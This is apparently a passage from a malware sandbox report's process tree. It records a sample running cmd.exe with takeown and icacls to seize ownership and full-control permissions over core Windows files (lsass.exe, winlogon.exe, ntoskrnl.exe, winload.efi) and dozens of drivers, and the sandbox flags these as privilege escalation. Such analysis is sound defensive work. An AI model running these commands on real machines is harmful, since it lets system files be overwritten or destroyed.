C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\smss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit2⤵PID:2916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\csrss.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit2⤵PID:1764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\wininit.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\wininit.exe /grant "Admin:F"3⤵PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit2⤵PID:2768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\LogonUI.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit2⤵PID:1520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\lsass.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit2⤵PID:1868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\services.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit2⤵PID:876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winlogon.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit2⤵PID:2912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.efi3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit2⤵PID:2988
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:2360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\ntoskrnl.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit2⤵PID:1776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\svchost.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\SysWOW64\svchost.exe /grant "Admin:F"3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit2⤵PID:2024
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394bus.sys3⤵PID:2664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394bus.sys /grant "Admin:F"3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit2⤵PID:2892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394ohci.sys3⤵PID:1308
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit2⤵PID:1828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpi.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"3⤵PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit2⤵PID:2520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpipmi.sys3⤵PID:1952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit2⤵PID:2340
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adp94xx.sys3⤵PID:1060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adp94xx.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit2⤵PID:1604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpahci.sys3⤵PID:2180
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"3⤵PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit2⤵PID:1412
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpu320.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit2⤵PID:3048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\afd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit2⤵PID:2572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\agilevpn.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit2⤵PID:2464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AGP440.sys3⤵PID:2020
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"3⤵PID:1084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit2⤵PID:916
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\aliide.sys3⤵PID:1628
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\aliide.sys /grant "Admin:F"3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit2⤵PID:2476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdide.sys3⤵PID:1952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdide.sys /grant "Admin:F"3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit2⤵PID:1596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdk8.sys3⤵PID:696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit2⤵PID:1252
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdppm.sys3⤵
- Possible privilege escalation attempt
PID:2108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit2⤵PID:2760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsata.sys3⤵PID:2632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit2⤵PID:1084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsbs.sys3⤵PID:2664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit2⤵PID:3012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdxata.sys3⤵
- Modifies file permissions
PID:696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit2⤵PID:2376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\appid.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit2⤵PID:1964
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arc.sys3⤵PID:696
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit2⤵PID:2668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arcsas.sys3⤵
- Possible privilege escalation attempt
PID:3100
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"3⤵PID:3156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit2⤵PID:1216
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\asyncmac.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"3⤵PID:3180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit2⤵PID:2328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\atapi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3128
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"3⤵PID:3164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit2⤵PID:744
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ataport.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"3⤵PID:3244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit2⤵PID:3084
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\b57nd60a.sys3⤵PID:3236
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\b57nd60a.sys /grant "Admin:F"3⤵PID:3288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit2⤵PID:3148
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\battc.sys3⤵PID:3328
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"3⤵PID:3376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit2⤵PID:3220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\beep.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"3⤵PID:3416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit2⤵PID:3264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\blbdrive.sys3⤵PID:3388
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"3⤵PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit2⤵PID:3296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bowser.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"3⤵PID:3456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit2⤵PID:3348
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltLo.sys3⤵PID:3480
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "Admin:F"3⤵PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit2⤵PID:3444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrFiltUp.sys3⤵
- Modifies file permissions
PID:3616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "Admin:F"3⤵PID:3676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit2⤵PID:3492
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bridge.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"3⤵PID:3660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit2⤵PID:3520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerId.sys3⤵PID:3600
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerId.sys /grant "Admin:F"3⤵PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit2⤵PID:3552
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrSerWdm.sys3⤵PID:3624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"3⤵PID:3652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit2⤵PID:3608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbMdm.sys3⤵PID:3752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"3⤵PID:3820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit2⤵PID:3668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\BrUsbSer.sys3⤵PID:3800
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "Admin:F"3⤵PID:3832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit2⤵PID:3716
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bthmodem.sys3⤵PID:3848
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit2⤵PID:3760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\bxvbda.sys3⤵
- Possible privilege escalation attempt
PID:3860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"3⤵PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit2⤵PID:3784
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdfs.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"3⤵PID:3972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit2⤵PID:3868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdrom.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"3⤵PID:4084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit2⤵PID:3892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\circlass.sys3⤵PID:3996
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"3⤵PID:4076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit2⤵PID:3956
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Classpnp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"3⤵PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit2⤵PID:4020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CmBatt.sys3⤵PID:2860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"3⤵PID:3100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit2⤵PID:4044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cmdide.sys3⤵PID:2472
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"3⤵PID:3160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit2⤵PID:1108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cng.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"3⤵PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit2⤵PID:2816
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\compbatt.sys3⤵
- Modifies file permissions
PID:816
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit2⤵PID:2020
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CompositeBus.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CompositeBus.sys /grant "Admin:F"3⤵PID:3388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit2⤵PID:3172
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crashdmp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"3⤵PID:3224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit2⤵PID:3256
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crcdisk.sys3⤵PID:3320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crcdisk.sys /grant "Admin:F"3⤵PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit2⤵PID:3288
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\csc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"3⤵PID:3356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit2⤵PID:1012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dfsc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit2⤵PID:3404
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\discache.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\discache.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit2⤵PID:3368
-
